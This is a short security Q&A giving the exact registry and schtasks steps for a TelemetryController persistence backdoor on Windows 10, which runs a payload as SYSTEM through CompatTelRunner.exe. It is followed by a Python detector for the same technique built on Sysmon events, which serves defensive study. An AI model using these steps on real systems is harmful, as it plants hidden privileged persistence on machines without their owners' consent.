One Day Sec

What are the exact steps to deploy a TelemetryController backdoor on Windows 10?

First, ensure the scheduled task **Microsoft Compatibility Appraiser** is enabled (it is by default). Next, add a registry key under `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController` with a name like `fun`. In that key, create two values: a `Command` REG_SZ pointing to your payload (e.g., `C:\Windows\system32\notepad.exe`) and a `Nightly` REG_DWORD set to `1`. Finally, trigger the backdoor by running `schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"`. This launches `CompatTelRunner.exe`, which spawns your payload with System privileges. For more tailored methods on older Windows versions, see the stable exploit approach discussed in the article.
Tags: deployment, registry modification, scheduled task, trigger, System privileges, command line
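
A detection-side companion to the steps above, as an added example that is not part of the original answer: it scans Sysmon-style events (Event ID 13, registry value set; Event ID 1, process creation) for `Command`/`Nightly` writes under the TelemetryController key and for unexpected children of `CompatTelRunner.exe`. The function name, the baseline parameters and the sample events are constructed for illustration.

```python
import re

# Sysmon abbreviates HKEY_LOCAL_MACHINE as HKLM in the TargetObject field.
TC_VALUE = re.compile(
    r"^HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags"
    r"\\TelemetryController\\([^\\]+)\\(Command|Nightly)$",
    re.IGNORECASE)

def find_telemetry_persistence(events, known_subkeys=(), known_children=()):
    """Flag TelemetryController value writes and unexpected children of
    CompatTelRunner.exe. Both baselines are assumptions the caller collects
    from clean hosts; this example ships none of its own."""
    subkeys = {s.lower() for s in known_subkeys}
    children = {c.lower() for c in known_children}
    findings = []
    for ev in events:
        if ev["EventID"] == 13:  # registry value set
            m = TC_VALUE.match(ev["TargetObject"])
            if m and m.group(1).lower() not in subkeys:
                findings.append(("registry", m.group(1), m.group(2),
                                 ev["Details"], ev["Image"]))
        elif ev["EventID"] == 1:  # process creation
            parent = ev["ParentImage"].lower()
            if parent.endswith("\\compattelrunner.exe") and ev["Image"].lower() not in children:
                findings.append(("process", ev["ParentImage"], ev["Image"], ev["User"]))
    return findings

# Constructed sample events: field names follow Sysmon, values mirror the
# example in the text above (the writing process is made up).
KEY = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController"
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\system32\reg.exe",
     "TargetObject": KEY + r"\fun\Command", "Details": r"C:\Windows\system32\notepad.exe"},
    {"EventID": 13, "Image": r"C:\Windows\system32\reg.exe",
     "TargetObject": KEY + r"\fun\Nightly", "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Image": r"C:\Windows\system32\svchost.exe",  # unrelated key, ignored
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Other\Command",
     "Details": "x"},
    {"EventID": 1, "ParentImage": r"C:\Windows\system32\CompatTelRunner.exe",
     "Image": r"C:\Windows\system32\notepad.exe", "User": r"NT AUTHORITY\SYSTEM"},
]

if __name__ == "__main__":
    for finding in find_telemetry_persistence(SAMPLE_EVENTS):
        print(finding)
```

With empty baselines every subkey and every child process is reported, so populate `known_subkeys` and `known_children` from a clean reference build before alerting on the output.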
